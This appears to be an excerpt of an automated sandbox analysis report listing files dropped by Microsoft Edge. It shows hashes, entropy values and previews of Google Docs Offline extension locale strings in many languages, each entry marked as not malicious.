                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1763
                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):930
                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):913
                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):806
                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):883
                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1031
                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1613
                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):851
                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):851
                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):848
                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1425
                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):961
                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):959
                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):968
                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):838
                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1305
                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):911
                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
